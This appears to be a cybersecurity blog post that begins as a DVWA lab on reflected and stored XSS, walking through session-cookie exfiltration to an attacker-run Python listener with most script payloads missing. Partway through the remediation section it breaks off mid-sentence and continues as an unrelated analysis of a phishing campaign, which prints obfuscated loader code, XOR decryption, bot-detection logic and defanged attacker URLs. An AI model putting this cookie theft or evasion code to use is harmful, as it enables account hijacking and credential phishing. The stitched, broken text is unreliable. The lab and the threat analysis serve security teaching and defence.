Dark Marc | Cybersecurity, Hacking & Tech

Lab Exercise: Cross-Site Scripting (XSS) Attacks on a Vulnerable Web Application with Burp Suite

Dark Marc — Sat, 28 Mar 2026 22:54:46 GMT

Web applications often accept input from users, whether through search boxes, login forms, comment sections, or URL parameters.

When a web application takes that input and displays it back on the page without checking or sanitizing it first, an attacker can inject malicious code into what other users see. This class of vulnerability is called Cross-Site Scripting, or XSS.

Because the injected script runs inside the victim’s browser and appears to originate from a legitimate site, the browser trusts it and executes it with full access to that site’s data. This includes session cookies, the tokens that keep users logged in.

Stealing a session cookie allows an attacker to impersonate the victim and take over their account without ever knowing their password.

Types of XSS Attacks

There are three types of XSS attacks:

Reflected XSS is delivered through a crafted link and executes the moment the victim visits it.
Stored XSS is injected once and then served automatically to every user who visits the affected page, making it significantly more dangerous.
DOM-based XSS happens entirely in the user’s browser without the server ever knowing. The page’s own JavaScript takes a piece of data (like part of the URL) and accidentally runs it as code.

Lab Environment & Tools

This lab requires a Hypervisor (such as VirtualBox, UTM, Parallels, or VMware) running two virtual machines on an isolated local network:

Kali Linux (Attacker): Your primary workstation. You will use Burp Suite, an industry-standard proxy tool used for web application security testing, to intercept and modify HTTP traffic between your browser and the target.
Metasploitable 2 (Target): A deliberately vulnerable Linux VM. It hosts the DVWA (Damn Vulnerable Web Application), an intentionally insecure app designed for security training.

Note: The version of DVWA pre-installed on Metasploitable2 (v1.0.7) only includes the Reflected and Stored XSS modules. To practice DOM-based XSS, upgrade DVWA to version 1.9 or newer. This lab covers Reflected and Stored attacks only.

Environment Setup:

Configure two virtual machines: Kali Linux, and Metasploitable 2.

For maximum security, place both VMs on the same isolated virtual subnet (Host-Only or Internal Network) within your hypervisor.

This ensures the vulnerable traffic is completely isolated from your host machine and your actual physical network.

If you are not comfortable configuring an isolated subnet, you can use Bridged Mode, but be aware this makes the vulnerable Metasploitable 2 VM visible to other devices on your local Wi-Fi or Ethernet.

Once the machines are set up, ensure they are on the same subnet. In this example, we’ll assume the following configuration (your specific IPs may vary):

Attacker (Kali): 10.10.10.10
Target (Metasploitable 2): 10.10.10.20
DVWA Access: http://10.10.10.20/dvwa

1. Burp Suite Configuration

Burp Suite is a proxy tool that sits between your browser and the target server, intercepting every HTTP request and response that passes between them.

Normally when you submit a form or click a link, your browser sends a request directly to the server and you have no visibility into what is being sent.

By routing your traffic through Burp, you can see the raw request, modify parameters before they reach the server, and replay requests as many times as you need.

In this lab you will use this to observe exactly how DVWA handles your input, craft payloads that would be difficult to send through the browser alone, and bypass client-side restrictions like character limits on input fields.

1.1 Launching Burp Suite

Launch Burpsuite from the terminal on Kali Linux using the command:

burpsuite

On launch, select “Temporary project”, followed by “Use Burp defaults”.

To intercept and modify traffic, you have two primary options:

Option A: The Built-in Browser: Navigate to the Proxy tab and click “Open Browser”. This is a pre-configured Chromium browser that automatically routes all traffic through Burp.
Option B: Manual Browser Configuration: If the built-in browser is unavailable or you prefer a custom setup (like Firefox), manually configure your browser’s proxy settings to point to 127.0.0.1 on port 8080.

1.2 Configuring the Proxy Listener

Before routing any browser traffic through Burp, you need to confirm that Burp is actually listening for incoming connections. The proxy listener is the address your browser will send traffic to, and Burp will forward it on to the target.

Navigate to Proxy > Proxy Settings and confirm the proxy listener is active on 127.0.0.1:8080.

1.3 Configuring Firefox as the Proxy Client

OPTIONAL: If you’re using the internal Burp Suite browser, and not configuring the proxy in Firefox, skip this section and go to next step.

Now that Burp is listening, you need to tell Firefox to route all of its traffic through it instead of sending requests directly to the server. Without this step, Burp has nothing to intercept.

Open Firefox and navigate to about:preferences. Search for “proxy”, which will surface the Network Settings option. Open it, select Manual proxy configuration, and set the HTTP Proxy to 127.0.0.1 on port 8080. Check “Also use this proxy for HTTPS” before saving.

Next, you need to install the PortSwigger CA certificate.

When Burp intercepts an HTTPS request, it decrypts it, lets you inspect and modify it, then re-encrypts it before forwarding it on. Firefox does not trust Burp’s certificate by default, so without this step it will block the interception and display a security warning instead of loading the page.

To download the certificate, browse to http://burpsuite in Firefox. This page will present a download link for the CA certificate file cacert.der. Once it is downloaded, go back to about:preferences and search “authorities”.

Open ‘View Certificates’, select the Authorities tab, and click Import. Select the cacert.der file, check “Trust this CA to identify websites”, and confirm.

Firefox will now trust Burp’s certificate and HTTPS traffic will pass through the proxy without warnings.

1.4 Verifying the Proxy

Before moving on, you need to confirm that traffic is actually flowing through Burp. If requests are not appearing in Burp’s history, any changes you make to requests will have no effect on the target.

Navigate to http://10.10.10.20/dvwa in whichever browser you configured in the previous step. Open Burp’s HTTP History tab and confirm that requests are appearing there. If they are, traffic is successfully passing through Burp and you are ready to begin.

2. DVWA Configuration

Before you can start testing, you need to log into DVWA and configure it to its most vulnerable state (‘Low’).

By default, DVWA runs with security controls that would block the payloads you are about to use. Setting the security level to Low disables all input filtering so the application reflects user input exactly as submitted, which is the condition you need to test these vulnerabilities.

Navigate to http://10.10.10.20/dvwa/login.php and log in with the default credentials:

Username: admin
Password: password

Once logged in, navigate to the DVWA Security menu, set the security level to Low, and save.

3. Exploit: Reflected XSS

Reflected XSS occurs when user-supplied input is immediately included in the server’s HTTP response without being validated or encoded.

The payload is not stored on the server. Instead, it is delivered to the victim through a crafted URL. When the victim visits the link, their browser sends the payload to the server, which reflects it back in the response.

The browser executes the script in the context of that domain, giving it access to that site’s cookies and session data.

3.1 Testing Methodology

Before injecting any malicious payload, you need to confirm that the application is actually reflecting your input unsanitized. You will start with a benign value, inspect how the server handles it, and escalate from there.

Navigate to /dvwa/vulnerabilities/xss_r/. Submit the input field with the value test and observe the resulting GET request in Burp’s HTTP History:

GET /dvwa/vulnerabilities/xss_r/?name=test HTTP/1.1

Open the response in Burp and confirm that the string test appears raw and unencoded in the HTML body. This confirms that user input is being reflected directly into the page without sanitization.

Send this request to Burp Repeater by right-clicking and selecting “Send to Repeater”. Repeater lets you modify and resend the same request without going back to the browser each time. In Repeater, modify the name parameter to test whether HTML markup is rendered:

GET /dvwa/vulnerabilities/xss_r/?name=hello

When you inspect the response in Burp, look at the HTML body. If the application had sanitized your input, it would have converted the tag into its encoded equivalent, <b>hello</b>, which the browser would display as plain text rather than markup.

If instead you see the raw hello tag sitting unmodified in the HTML, the application is passing your input straight into the page.

This means the browser will treat whatever you submit as part of the page’s code, not as text to display. A tag makes text bold. A

You can see in the response that the script tag sits unmodified in the HTML body.

To confirm it executes, navigate to the full URL directly in your browser:

http://10.10.10.20/dvwa/vulnerabilities/xss_r/?name=

If the application is vulnerable, it will not display the script tag as text.

Instead, the browser will execute it and an alert dialog will pop up displaying the current session cookie.

This confirms two things: JavaScript is executing in the page, and it has access to the session cookie that identifies your logged-in session to the server.

3.3 Cookie Exfiltration

An alert box proves the vulnerability exists, but it does not cause any real harm on its own because the cookie never leaves your machine.

In a real attack, the goal is to silently transmit that cookie to a server the attacker controls, where it can be captured and used to hijack the session. You will simulate this now.

Start a Python HTTP server on your Kali machine. This will act as your receiving server, logging any requests that come in:

python3 -m http.server 8000

Now modify the payload. Instead of triggering an alert, this version uses the browser’s fetch function to send an HTTP request to your server with the cookie attached as a URL parameter:

Visit the crafted URL in the browser.

http://10.10.10.20/dvwa/vulnerabilities/xss_r/?name=

The page will load silently with no visible indication that anything happened. On your Kali machine, your Python server will log an incoming GET request with the session cookie appended to it. The cookie has been exfiltrated.

In a real attack, an attacker would embed this payload in a link and send it to a victim through a phishing email or message.

The victim clicks the link, their browser silently fires the request in the background, and the attacker receives their session cookie.

The attacker can then load that cookie into their own browser and access the victim’s account without ever knowing their password.

4. Exploit: Stored XSS

Stored XSS occurs when malicious input is saved to the server and later served to other users. Unlike Reflected XSS, no crafted link is required.

Any user who visits the page will have the script executed in their browser automatically. A single successful injection affects every subsequent visitor to that page for as long as the payload remains in the database.

4.1 Confirming the Vulnerability

Before injecting anything malicious, you will first observe how the application handles a normal submission so you can see exactly what gets sent to the server and where your injection point is.

Navigate to /dvwa/vulnerabilities/xss_s/. This page presents a guestbook form with a Name field and a Message field. Submit the form with any values.

Now open Burp’s HTTP History tab and locate the POST request that was just captured:

POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1
txtName=Marc&mtxMessage=Testing&btnSign=Sign+Guestbook

The form data is broken into parameters. The one you are interested in is mtxMessage, which contains whatever was typed into the Message field. This is your injection point.

4.2 Script Injection

Now that you can see how the form submits data, you will use Burp Repeater to modify the request and inject a script payload directly.

Sending the request through Repeater rather than the browser form matters here because the Message field enforces a 50-character limit on the client side. This limit exists in the browser only and has no effect on the actual request sent to the server. Repeater sends requests directly, bypassing the browser entirely, which means the character limit does not apply.

Send the captured request to Repeater by right-clicking it in HTTP History and selecting “Send to Repeater”.

Modify the mtxMessage parameter to inject a script payload:

txtName=test&mtxMessage=&btnSign=Sign+Guestbook

Send the request from Repeater. Now navigate back to the guestbook page in your browser:

http://10.10.10.20/dvwa/vulnerabilities/xss_s/

The alert will fire automatically as soon as the page loads. You did not craft a special link or take any further action. The payload was stored in the database when you sent the request, and the server is now injecting it into the page for every visitor.

This is what makes Stored XSS more dangerous than Reflected XSS. The victim does not need to click anything out of the ordinary. Simply visiting a page they already trust is enough to execute the payload.

To reset the environment before the next step, go to DVWA Setup and click “Create / Reset Database” to clear all stored entries.

4.3 Cookie Exfiltration

Just as with Reflected XSS, an alert box proves the vulnerability but causes no real harm on its own. You will now escalate the payload to silently transmit the session cookie of every user who visits the guestbook page to your receiving server.

As covered in the previous section, the 50-character limit on the Message field is enforced by the browser only. For the exfiltration payload you have two bypass options.

You can right-click the Message input field in your browser, select Inspect, and edit the maxlength attribute directly to a higher number.

Alternatively, you can send the request directly through Burp Repeater, which bypasses the form entirely. Either approach works.

Make sure your Python HTTP server is still running on your Kali machine. If it is not, start it again:

python3 -m http.server 8000

Submit the following payload through the guestbook form, using whichever bypass method you chose:

Now navigate to the guestbook page in your browser:

http://10.10.10.20/dvwa/vulnerabilities/xss_s/

The page will load silently with no visible indication that anything happened. On your Kali machine, your Python server will log an incoming GET request with the session cookie appended to it.

Unlike Reflected XSS, the attacker does not need to send anyone a link. The payload is already sitting in the database.

Every browser session that loads the guestbook page will automatically fire the request to your server, silently handing over that visitor’s session cookie.

A single injection harvests credentials from every user who visits the page, with no further action required from the attacker.

5. Remediation Recommendations:

Both vulnerabilities share the same root cause: user-supplied input is inserted directly into the HTML page without being checked or transformed first.

The browser has no way of knowing whether a script tag came from the application or from an attacker, so it executes it either way.

The fixes below address this at different layers.

Output Encoding

This is the primary fix for both Reflected and Stored XSS. Before rendering any user-supplied input in a page, the application should convert characters that have special meaning in HTML into their safe equivalents. For example, < becomes < and > becomes >. When the browser encounters these encoded versions, it displays them as text rather than interpreting them as code. A script tag submitted by an attacker would appear on the page as the literal string

2. Parameter Merger Script

The attacker uses a parameter-merging script to make sure tracking data and payload information persist as a victim moves through the attack chain.

If this data is not passed to the next link, the attacker loses visibility into the victim and the infrastructure may fail to properly validate the session.

Put simply, if the attacker sends a victim to the page using a URL parameter for tracking a Victim ID (VID), then any links on the page marked with the HTML attribute data-framer-preserve-params will be updated to include that ID.

/* PARAMETER TRACKING LOGIC */

!function() {
    var l = "framer_variant";
    
    // THE ENGINE: Extracts and merges parameters from current page to target URL
    function u(a, r) {
        let n = r.indexOf("#"),
            e = n === -1 ? r : r.substring(0, n), // Base URL
            o = n === -1 ? "" : r.substring(n),   // URL Fragment (#)
            t = e.indexOf("?"),
            m = t === -1 ? e : e.substring(0, t), // Domain/Path
            d = t === -1 ? "" : e.substring(t),   // Existing Query String
            s = new URLSearchParams(d),           // Target params
            h = new URLSearchParams(a);           // Source (Victim) params

        // Loops through source params (VID, QID, etc.) and appends them
        for (let [i, g] of h) 
            s.has(i) || i !== l && s.append(i, g);

        let c = s.toString();
        return c === "" ? e + o : m + "?" + c + o;
    }

    // THE DRIVER: Identifies specific links on the page to weaponize

    var f = "div#main a[data-framer-preserve-params]";
    
    if (window.location.search && !navigator.webdriver) {
        let a = document.querySelectorAll(f);
        for (let r of a) {
            let n = u(window.location.search, r.href);
            r.setAttribute("href", n); // Injects tracking IDs into the link
        }
    }
}();

This allows the attacker to send multiple victims to the same page while keeping each victim’s unique tracking ID attached to the link for the next stage, preserving their identity throughout the flow.

Note: In this case, the attacker did not send the victim to the page with a URL parameter, which caused the entire script to go unused. It is unclear whether this was intentional or a misconfiguration.
Instead, tracking was implemented using unique hash values embedded in the download button URL. While this still allows the attacker to identify that a unique victim has entered the system, it removes visibility into which specific targets or delivery methods led to the click.
As a result, the attacker loses some tracking detail at this stage and relies solely on hash-based tracking further down the chain.

2. Download button

The “VIEW / DOWNLOAD SECURE DOCUMENT” button redirects the victim to an external URL hosted behind a URL shortening service:

https://rebrand[.]ly/4e27bc#Yz0xJl9oPTI2R2xIS08--
Note: link disabled by adding [.] on the to prevent accidental click.

The use of a URL shortener obscures the next destination in the chain.

Hash Value in Download Link:

The URL includes a fragment value appended after the # symbol:

#Yz0xJI9oPTI2R2xIS08--

This fragment acts as a unique identifier associated with the page load. Each fresh browser session receives a new value, which enables per-visitor tracking.

Under normal browser behavior, URL fragments are used to reference a section of a page, such as #section3. These fragments are not transmitted to the server during HTTP requests. They remain client-side but persist through redirects unless explicitly removed.

In this case, the fragment is intentionally preserved across the redirect chain. It is later extracted and processed by subsequent pages to maintain tracking continuity.

Base64-Encoded Tracking Data

The fragment value is Base64 encoded. When decoded, it resolves to:

c=1&_h=26GIHKO

This output shows structured key value pairs rather than random data. These values function as tracking parameters that downstream scripts can parse and reuse as the victim moves through additional stages.

This technique enables persistent identification across multiple redirects and domains while avoiding traditional query string transmission.

3. Event Hijacking

The page uses an event hijacking script designed to ensure that nearly any user interaction results in a redirect to the next stage of the flow.

Instead of relying on a standard clickable link, the script intercepts multiple browser events and explicitly triggers navigation through JavaScript.

Hijacked Interaction Events

The script attaches event listeners to any element containing the data-nested-link attribute. This effectively turns large portions of the page into redirect triggers rather than traditional links.

The following interaction types are explicitly intercepted:

Left click events
Right click and middle click events via auxclick
Keyboard interaction using the Enter key

Regardless of whether the user clicks, right clicks, middle clicks, or presses Enter, the script suppresses default browser behavior and forces navigation to the embedded URL.

Forced Navigation Mechanism

Instead of allowing the browser to handle navigation naturally, the script dynamically creates a temporary element.

It assigns the href, target, and rel attributes, programmatically triggers a click, then immediately removes the element from the DOM.

This method produces consistent navigation behavior across browsers, operating systems, and mobile environments.

This approach also neutralizes common hesitation behaviors such as right clicking to inspect a link or using keyboard navigation, since all interactions are treated as deliberate clicks.

Impact on the Attack Chain

By hijacking multiple event types, the attacker significantly reduces friction and increases conversion rates. The victim is funneled into the next stage of the phishing flow regardless of interaction method.

4. Anti-Bot Detection

The page contains anti-automation logic designed to limit access to tracked victim flows and hinder automated analysis. Execution of this logic is conditional, depending on the presence of URL parameters.

if(window.location.search&&
   !navigator.webdriver&&
   !/bot|-google|google-|yandex|ia_archiver|crawl|spider/iu.test(navigator.userAgent))

Conditional Execution of Bot Checks

The anti-bot checks only run when window.location.search contains query parameters. If the page is accessed without URL parameters, this block is skipped entirely and no automation checks occur.

As mentioned earlier, in this campaign the phishing page itself was delivered without URL parameters, even though the operation was active and monitored. Victim tracking relied on a Base64-encoded hash fragment embedded in the Rebrand.ly download link rather than query strings.

As a result, the anti-bot logic was never triggered during the initial page load.

Detection Signals Used When Active

If URL parameters are present, the script applies multiple signals to detect automated analysis:

navigator.webdriver to detect browser automation frameworks
User agent pattern matching for known crawlers and scanners
Implicit filtering of headless or scripted browsing environments

This ensures bot detection only runs when the attacker expects to preserve and propagate victim-specific tracking data.

Part 2: Server-Side Functions

After the victim clicks “VIEW / DOWNLOAD SECURE DOCUMENT”, control shifts from the client-side Framer page to server-side infrastructure.

From this point forward, all logic is handled through a series of redirects and backend checks designed to validate the victim, manage tracking, and decide whether the attack should continue.

CloudFlare Phishing Infrastructure

The next stages of the attack are hosted on Cloudflare Workers. Using Cloudflare provides the attacker with trusted infrastructure, valid SSL certificates, and strong reputation shielding. Because Cloudflare Workers are widely used for legitimate applications, traffic to these domains is far less likely to be blocked or flagged.

This also allows the attacker to dynamically update logic, redirect behavior, and payload handling without touching the original phishing page.

Redirect #1: Cloudflare Worker

The Rebrand.ly short link resolves to a Cloudflare Workers endpoint, with the hash fragment preserved at the end of the URL:

https://mute-bar-10df.seanco1212.workers[.]dev/#Yz0xJI9oPT12R2xIS08--

At this stage, the fragment still contains the Base64-encoded tracking data generated on the previous page.

Redirect #2: Hash Decoded

The Cloudflare Worker decodes the hash fragment and reloads the page, converting part of the decoded value into URL parameters:

https://mute-bar-10df.seanco1212.workers[.]dev/?c=1#26GlHKO 
Note: link disabled by adding [.] on the to prevent accidental click.

This transition marks the first time the tracking data becomes visible to server-side logic. The decoded values are now usable by backend scripts for validation and routing decisions.

At this point, the page displays a fake loading screen, intended to delay the victim while backend checks are performed.

Multiple variations of this loading screen were observed, suggesting either simple A/B testing or conditional rendering based on backend responses.

Network Traffic Analysis

The URLScan.io results for this page reveal the full server-side orchestration happening behind the loading screen. The browser network inspector shows 14 HTTP transactions with a mix of successful and failed requests, providing insight into the attack’s infrastructure redundancy and anti-analysis measures.

Requests to GitHub-hosted JSON files containing encrypted payload data.
Calls to verification endpoints used to validate the victim session
Requests to infrastructure responsible for tracking and routing decisions

Successful Resource Requests

The page successfully loads four critical resources that drive the phishing operation:

GitHub-Hosted Payload Files:

GET https://raw.githubusercontent[.]com/laurseraph-svg/oatedbilly/main/ramen_p.json
Status: 200 | Size: 161 KB | Server: Fastly CDN (185.199.109.133)
{"v":1,"d":"8yyGeh2bLgWq460Fp5oDUnEwsucoAGhhHFAd5JUVxZEwQNaX8QQpDZ...

GET https://raw.githubusercontent[.]com/laurseraph-svg/oatedbilly/main/cap_ram.json
Status: 200 | Size: 88 KB | Server: Fastly CDN (185.199.108.133)
{"v":1,"d":"-GTM7rStxej7fYCVBT3RgwWd3xkttpHbx0RKbUKlkCgyYu0Rg0EpP1gQZ2yv29boG-D...

Both files have the same format: a version field (”v”: 1) and an encrypted data field (”d”). The “d” value is encoded and likely decrypts to HTML, JavaScript, or configuration data for the next stage of the phishing page.

Using GitHub is intentional because it is a trusted, reliable platform that often bypasses security filters, provides free hosting with high uptime, and allows attackers to manage and update their payloads with version control.

Verification Server Responses:

The verification endpoint is called twice with different response sizes, suggesting a two-phase validation process.

GET https://kleavbre.site/r/cls/verified_server.php
Status: 200 | Size: 63 B | Server: Namecheap (162.254.39.240)
Response: application/json

GET https://kleavbre.site/r/cls/verified_server.php  
Status: 200 | Size: 344 B | Server: Namecheap (162.254.39.240)
Response: text/plain

The first request (63 bytes) likely returns a simple JSON validation response, possibly a boolean or session token confirming the visitor passed initial checks.

The second request (344 bytes) returns a larger text/plain response, which may contain routing instructions, configuration parameters, or the decryption key needed to unlock the payload data from the GitHub JSON files.

Purpose of the Server-Side Layer

This server-side phase supports the phishing operation by making it more resilient and harder to detect:

Decode and validate victim tracking data: Verification endpoints decode and check hash parameters to ensure the visitor followed the intended attack path, preventing direct access to phishing pages and limiting access to users who clicked the original malicious link.
Control progression through the attack chain: Payloads are delivered only after successful validation, giving the attacker control over who sees specific content, while suspicious traffic can be dropped or redirected to benign pages.
Fetch and deliver updated payload components: GitHub-hosted JSON files can be updated in real time without redeploying Cloudflare Workers or related infrastructure, allowing rapid design changes, A/B testing of lures, and quick pivots when detection occurs.
Centralize logic for operational flexibility: Backend-based decision logic allows changes to routing, targeting, and payload delivery without modifying frontend pages, improving scalability and making static analysis more difficult.
Infrastructure resilience: Multiple verification domains and platforms provide redundancy, so if one endpoint is blocked or taken down, others can continue serving the attack chain.

By placing this logic behind Cloudflare Workers and external validation servers, the attacker separates presentation from control. This makes the operation more resilient to takedowns, harder to analyze through automated scanners, and easier to maintain at scale across multiple simultaneous campaigns.

Once these checks complete successfully and the payloads are decrypted, the victim is forwarded to the next stage of the attack, where interactive phishing and credential capture begin.

Part 3: Phishing Page (CAPTCHA)

After passing through the validation layer, the victim lands on a CAPTCHA page designed to appear as a legitimate Google security check.

This page implements multiple layers of anti-analysis defenses while simultaneously preparing the final phishing payload.

The URL is:

https://accounts-g0033le-com-bc7e.robertsoneric509.workers[.]dev/?rd9=OV1ULFNKZFYVZwVZKQ8IclUUIQdJbAVRIQ1SegJSO10DIVVSNFAfOUIDaRlaMlwuWBsyQB1_RB8mUUE-FwkqQFgzUws9VwEiUT09VREsXBNqRA44Bx0oQBk1T0g4An5YDmUDTzQAFGZSDSgJWn4HTiMOSWADWSZRACtRVw==

Note: link disabled by adding [.] on the to prevent accidental click.

Flow of This Page:

Initial Load: The obfuscated code unpacks itself.
Bot Detection: It scores the browser environment.
Sandbox Check: It tests for automated analysis tools.
CAPTCHA Display: The page shows a fake verification UI.
User Interaction: It tracks mouse movements and timing.
Validation: The script checks for bot-like behavior.
Payload Fetch: It connects to the C2 infrastructure.
Decryption: The system decrypts payload data using XOR and AES.
Final Payload: It loads malicious HTML or JS via a Blob URL.

Fake Google.com Domain:

The URL is designed to deceive victims at first glance by mimicking a legitimate Google address. It uses typosquatting by replacing “google” with “g0033le” to bypass quick visual inspections.

https://accounts-g0033le-com-bc7e.robertsoneric509.workers[.]dev/

The “accounts-g0033le-com” string acts as a subdomain trick on a Cloudflare Workers domain. This visual mimicry works because the brain reads the string as “accounts.google.com” at a glance.

The site uses a valid Cloudflare SSL certificate to display a padlock icon and build false trust. This exploits typoglycemia, where the brain perceives words as whole patterns rather than individual letters.

These misspellings help the attacker avoid automated detection systems. Most users fail to notice the domain is misspelled or hosted as a subdomain of a third-party service.

Base64 Encoded URL

The CAPTCHA page URL includes an obfuscated parameter. This parameter does not directly point to the phishing page. Instead, it contains a Google open redirect link.

A Google open redirect is a legitimate Google URL that simply forwards the browser to another website specified in the link. When a user visits it, their browser first loads a page on google.com, then Google immediately redirects them to the final destination.

Attackers abuse this behavior because it makes the link appear to come from Google, even though the final page is controlled by the attacker.

The real destination is hidden so security scanners cannot easily see what the browser will actually request, and users are more likely to trust the redirect.

The real destination is protected by two layers of obfuscation:

First, the link is Base64 encoded
Second, it is encrypted using a simple encryption method called XOR

Base64 makes readable text look random. XOR then further scrambles that data so it cannot be understood without the key.

XOR works by combining each character of the original text with a secret key character. This changes the original data into unreadable output. Applying the same key again reverses the process and restores the original link. The same key is used to both hide and reveal the destination.

Layer 1: Base64 Decoding

The rd9 parameter in the URL is Base64 encoded:

?rd9=OV1ULFNKZFYVZwVZKQ8IclUUIQdJbAVRIQ1SegJSO10DIVVSNFAfOUIDaRla...

When decoded, this value does not produce a readable URL. Instead, it reveals another encrypted string.

Layer 2: XOR Decryption

The decoded value is then decrypted using XOR. The XOR key is hardcoded in the JavaScript running on the page.

The script processes the decoded string one character at a time and XORs each character with the corresponding character from the key. When the end of the key is reached, the script loops back to the beginning.

// XOR decryption key found in the source
var _0x3f3017 = 'K9mP2xQ7vR' + '4nL8jF3wE6' + 'yT1hG5bN0c' + 
                 'Z9aD4fH8kM' + 'cV6wE2sL9p';
// Full key: K9mP2xQ7vR4nL8jF3wE6yT1hG5bN0cZ9aD4fH8kMcV6wE2sL9p

// XOR decryption function
var _0x5dae5f = function(_0x5385a4){
    // Replace URL-safe Base64 chars
    var _0x51080c = _0x5385a4.replace(/-/g,'+').replace(/_/g,'/');
    
    // Base64 decode
    var _0x443407 = atob(_0x51080c);
    var _0x7b605e = '';
    
    // XOR each byte with key
    for(var _0x58af27 = 0; _0x58af27 < _0x443407.length; _0x58af27++) {
        _0x7b605e += String.fromCharCode(
            _0x443407.charCodeAt(_0x58af27) ^ 
            _0x3f3017.charCodeAt(_0x58af27 % _0x3f3017.length)
        );
    }
    return _0x7b605e;
};

The Decryption Process:

The full decryption flow works as follows:

URL‑safe Base64 characters are converted to standard Base64
The string is Base64 decoded
Each byte is XORed with the hardcoded key
The output becomes a readable URL

Final Decrypted Result

After both decoding and decryption, the hidden value resolves to:

https://www.google.com/url?q=https://pub-2868288599424707.r2[.]dev/index.html#user@target-domain.com

This layered obfuscation ensures the real destination remains hidden until the final stage, after client‑side code execution, making static analysis and automated detection much more difficult.

Code Obfuscation Layer

The JavaScript code on the CAPTCHA page uses heavy obfuscation to prevent static analysis and slow down manual reverse engineering.

This obfuscation layer functions as an initial barrier, ensuring that security tools and scanners cannot easily determine the script’s behavior without executing it in a browser or sandbox.

Obfuscated Loader Function

One of the first constructs encountered is a self executing anonymous function combined with array rotation logic:

// Self-executing anonymous function with array rotation
(function(_0x1d6412,_0xa89068){
    var _0x45dc68=_0x_0x2e07,_0x30dae7=_0x_0x2e07,_0x208be3=_0x1d6412();
    while(!![]){
        try{
            var _0x4b03ab=parseInt(_0x45dc68(0x205))/(0x20ce+-0x3*-0x20c+-0x26f1)*(-parseInt(_0x30dae7(0x1fa))/(-0x2ee+-0x1*-0x1b73+-0x1883))
            // ... more obfuscated math
            if(_0x4b03ab===_0xa89068)break;
            else _0x208be3['push'](_0x208be3['shift']());
        }catch(_0x2ca087){
            _0x208be3['push'](_0x208be3['shift']());
        }
    }
}(_0x_0x2fa0,0xfb7+-0x56696+0xe2f1e))

This code executes automatically as soon as the page loads. Wrapping the logic in an immediately invoked function expression creates a private scope, preventing variables and helper functions from being accessed directly by analysis tools or browser consoles. Everything meaningful is hidden inside the closure.

Hex Encoded Arithmetic Confusion

Throughout the code, arithmetic operations are written using hexadecimal values combined with misleading math expressions.

Expressions such as 0x20ce+-0x3*-0x20c+-0x26f1 look arbitrary but resolve to fixed numeric values at runtime. This prevents simple pattern matching and makes it difficult to determine which array index or condition is being evaluated by simply reading the source.

Array Rotation Logic

The loader relies heavily on array rotation to hide string values. A string array is repeatedly modified using shift() and push() operations. Each iteration removes the first element of the array and appends it to the end. This continues until a calculated condition is met.

Because the array is constantly being reordered, the numeric index used to retrieve a string does not correspond to a fixed value until the rotation completes. Any attempt to read string references statically will produce incorrect results unless the rotation logic is executed first.

Variable Name Scrambling

All variables and functions are assigned meaningless hexadecimal style identifiers such as _0x1d6412, _0xa89068, and _0x45dc68.

These names convey no semantic information about their purpose or contents. This forces an analyst to track values manually through execution rather than relying on readable identifiers, significantly increasing analysis time.

Function Reference Obfuscation

Functions are not called by descriptive names. Instead, function references are stored inside the rotated string array and accessed using numeric indices.

Calls such as _0x45dc68(0x205) resolve to real functions only after the array has been reordered correctly. Without executing the code, it is not possible to determine which function is actually being invoked.

Obfuscated String Array

The obfuscation relies on a large string array that stores encoded values used throughout the script:

function _0x_0x2fa0(){
    var _0x124df4=[
        'mZy3ode2nuXczvPNtG',
        'B3bLBG',
        'BuTXB20',
        'r0vu',
        'zNvUy3rPB24GkG',
        // ... hundreds of obfuscated strings
    ];
    _0x_0x2fa0=function(){return _0x124df4;};
    return _0x_0x2fa0();
}

This array contains hundreds of Base64 encoded strings that represent real JavaScript code fragments, function names, URLs, and string literals. These values are referenced by numeric index throughout the script. Because the array order is altered at runtime, the mapping between index and actual value changes dynamically.

Without executing the rotation logic, it is impossible to know what value a reference like _0x124df4[5] actually resolves to.

Effectiveness of the Obfuscation

This obfuscation strategy is effective against multiple forms of detection. Static analysis tools that do not execute JavaScript are unable to resolve string values, function calls, or control flow.

Signature based detection fails because the structure and ordering of the code can change between deployments. Manual reverse engineering becomes time consuming because meaningful logic is distributed across layers of indirection and runtime transformations.

The code also resembles patterns used by legitimate JavaScript packers and minifiers, which reduces the likelihood of it being flagged as malicious based solely on structure.

Without executing the script in a controlled environment or manually stepping through the deobfuscation process, security tools are left with JavaScript that appears unintelligible and does not match known threat signatures.

Bot Detection System

Once the obfuscated JavaScript finishes unpacking, the page immediately evaluates the browser environment to determine whether it is being accessed by a real user or by an automated analysis tool. This logic runs before the phishing payload is allowed to load and acts as a gate that controls whether execution continues.

This function returns a numeric score based on multiple environment checks. Each check adds points when a signal commonly associated with automation, headless execution, or analysis tooling is detected.

Core Detection Function:

window._vE=function(){
    var s=0;
    try{if(typeof process!=='undefined'&&process.versions)s+=5;}catch(e){}
    try{if(n.webdriver||w.callPhantom||w.__nightmare)s+=5;}catch(e){}
    try{if(n.userAgent&&(n.userAgent.indexOf('jsdom')>-1||n.userAgent.indexOf('Headless')>-1))s+=5;}catch(e){}
    try{if(!w.chrome&&!w.safari&&n.vendor==='')s+=3;}catch(e){}
    try{if(w.outerWidth===0||w.outerHeight===0)s+=3;}catch(e){}
    try{if(w.innerWidth===0||w.innerHeight===0)s+=3;}catch(e){}
    try{var t=Function.prototype.toString;if(t.call(t).indexOf('native code')===-1)s+=3;}catch(e){}
    try{if(typeof module!=='undefined'&&module.exports)s+=4;}catch(e){}
    return s;
};

How the Detection Works:

The function builds a cumulative score by testing for characteristics that are rarely present in real user browsers but commonly appear in automation frameworks, headless environments, and security scanners.

Each test is wrapped in a try catch block so that failing to access one signal does not stop the remaining checks from running.

This design allows the detection logic to remain effective even when parts of the environment are restricted, partially sandboxed, or instrumented.

The script checks for the following indicators:

Node JS: Identifies server-side environments by checking for the process global object (+5) or the module.exports CommonJS system (+4). Real browsers lack these, indicating the use of tools like Puppeteer.
Automation Tools: Flags standard automation fingerprints. It checks navigator.webdriver (+5), a property set to true by Selenium/WebDriver, and scans for legacy bot globals like callPhantom or __nightmare (+5).
Headless Browser Identification: Detects the absence of a physical UI. It scans the User-Agent for “jsdom” or “Headless” strings (+5). It also checks for Zero outer dimensions (window.outerWidth/Height) (+3) and Zero inner dimensions (window.innerWidth/innerHeight) (+3), as bots often fail to render a visual viewport.
Environment Tampering: Detects attempts to mask bot activity. It flags a Modified Function.toString (+3) if the native code string is missing, indicating hooked functions. It also checks for a Missing vendor string (+3) in navigator.vendor, which is populated in real browsers like Chrome or Safari.

Scoring Threshold:

The detection logic does not block execution directly. Instead, a separate gate function named _vG calls _vE and decides whether the page is allowed to proceed.

